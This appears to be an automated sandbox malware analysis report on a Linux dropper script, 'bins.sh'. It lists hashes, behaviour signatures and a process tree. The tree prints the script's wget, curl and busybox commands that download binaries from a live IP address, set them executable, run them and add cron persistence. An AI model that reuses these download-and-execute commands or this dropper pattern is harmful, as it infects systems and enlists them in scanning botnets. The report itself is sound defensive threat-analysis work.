Analysis
max time kernel: 149s
max time network: 150s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 09-11-2024 21:09
Static task: static1
Behavioral task: behavioral1 (Sample: bins.sh, Resource: ubuntu1804-amd64-20240611-en)
Behavioral task: behavioral2 (Sample: bins.sh, Resource: debian9-armhf-20240418-en)
Behavioral task: behavioral3 (Sample: bins.sh, Resource: debian9-mipsbe-20240611-en)
Behavioral task: behavioral4 (Sample: bins.sh, Resource: debian9-mipsel-20240418-en)
General
Target: bins.sh
Size: 10KB
MD5: 80fbc92fef78f4dd4d74728414ee221d
SHA1: a7ad696c79b7b407183a230f08fa116394feb71a
SHA256: 6755362ddf5c3b8b031ebacaaec1ae40a9fc13d9954a63c8797ce84240f1c7d0
SHA512: ad2bfdb0bb89f024cd69ca1619353f7c3a86d222985a3b28fc36a20281961f4e205ef0cbbb93f5aeae226c942df346ce5919f9db4cc65b9accaeb37396c10a52
SSDEEP: 192:/WRJ4AQsqRh1zn/3C+iiNsZxB1rm2mPn/3C+uQsqRhYVB1rm2i26RJh:tBzn/3C+iimxB1rm2mPn/3C+AB1rm2w
Malware Config
Signatures
- Contacts a large (2177) amount of remote hosts (1 TTP)
  This may indicate a network scan to discover remotely running services.
- Creates a large amount of network flows (1 TTP)
  This may indicate a network scan to discover remotely running services.
- File and Directory Permissions Modification (1 TTP, 1 IoC)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes (pid, process): 1514 chmod
- Executes dropped EXE (1 IoC)
  Processes (ioc, pid, process): /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq, 1515, tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq
- Renames itself (1 IoC)
  Processes (pid, process): 1516 tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq
- Creates/modifies Cron job (1 TTP, 1 IoC)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  Processes (description, ioc, process): File opened for modification, /var/spool/cron/crontabs/tmp.RiiwEP, crontab
- Enumerates running processes
  Discovers information about currently running processes on the system.
  Processes: tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq opened the following files for reading:
  /proc/1574/cmdline, /proc/31/cmdline, /proc/1058/cmdline, /proc/1540/cmdline, /proc/1542/cmdline, /proc/1806/cmdline, /proc/16/cmdline, /proc/30/cmdline, /proc/1609/cmdline, /proc/1802/cmdline, /proc/1681/cmdline, /proc/10/cmdline, /proc/34/cmdline, /proc/1499/cmdline, /proc/1646/cmdline, /proc/1586/cmdline, /proc/1604/cmdline, /proc/13/cmdline, /proc/85/cmdline, /proc/1140/cmdline, /proc/1185/cmdline, /proc/187/cmdline, /proc/1266/cmdline, /proc/1531/cmdline, /proc/1535/cmdline,
  /proc/1275/cmdline, /proc/1799/cmdline, /proc/1742/cmdline, /proc/1824/cmdline, /proc/415/cmdline, /proc/1168/cmdline, /proc/1576/cmdline, /proc/1608/cmdline, /proc/490/cmdline, /proc/735/cmdline, /proc/1823/cmdline, /proc/1827/cmdline, /proc/666/cmdline, /proc/5/cmdline, /proc/14/cmdline, /proc/9/cmdline, /proc/25/cmdline, /proc/1679/cmdline, /proc/1553/cmdline, /proc/1700/cmdline, /proc/11/cmdline, /proc/1623/cmdline, /proc/1815/cmdline, /proc/1622/cmdline, /proc/326/cmdline, /proc/1552/cmdline,
  /proc/1819/cmdline, /proc/488/cmdline, /proc/1530/cmdline, /proc/1785/cmdline, /proc/1796/cmdline, /proc/1657/cmdline, /proc/1678/cmdline, /proc/522/cmdline, /proc/954/cmdline, /proc/956/cmdline, /proc/1526/cmdline, /proc/1015/cmdline, /proc/1533/cmdline
- System Network Configuration Discovery (1 TTP, 5 IoCs)
  Adversaries may gather information about the network configuration of a system.
  Processes (pid, process): 1522 rm; 1507 wget; 1512 curl; 1513 busybox; 1515 tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq
- Writes file to tmp directory (3 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description, ioc, process): File opened for modification, /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq, wget; File opened for modification, /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq, curl; File opened for modification, /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq, busybox
Processes (indentation shows the parent/child depth of the process tree; each entry is path: command line, PID, then the signatures it triggered)
- /tmp/bins.sh: /tmp/bins.sh (PID 1505)
  - /bin/rm: /bin/rm bins.sh (PID 1506)
  - /usr/bin/wget: wget http://216.126.231.240/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 1507)
    Signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 1512)
    Signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 1513)
    Signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /bin/chmod: chmod 777 tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 1514)
    Signatures: File and Directory Permissions Modification
  - /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq: ./tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 1515)
    Signatures: Executes dropped EXE; Renames itself; Reads runtime system information; System Network Configuration Discovery
    - /bin/sh: sh -c "crontab -l" (PID 1517)
      - /usr/bin/crontab: crontab -l (PID 1518)
    - /bin/sh: sh -c "crontab -" (PID 1519)
      - /usr/bin/crontab: crontab - (PID 1520)
        Signatures: Creates/modifies Cron job
  - /bin/rm: rm tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq (PID 1522)
    Signatures: System Network Configuration Discovery
  - /usr/bin/wget: wget http://216.126.231.240/bins/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ (PID 1525)
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ (PID 1526)
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 112KB
  MD5: 05d7857dcead18bbd86d2935f591873c
  SHA1: 34d18f41ef35f93d5364ce3e24d74730a4e91985
  SHA256: 2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
  SHA512: d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
- Filesize: 210B
  MD5: c56b51c31b07036326f1f9addb3f8e88
  SHA1: 00be82cd2d4609a1bd1226a51b90d0dc2305aca4
  SHA256: dadcdd124053b518a4725004f3e0ba94138b2be11f67919e35cdadc5fc7ae09e
  SHA512: 5252e018265a8f79e6726f5a933eaaefd32e7253bb40417c7ac8111fc08b7d6dca472a23ea7be425ffaddfa37855109bdbdf31ccf056c1787dc78263c5b67382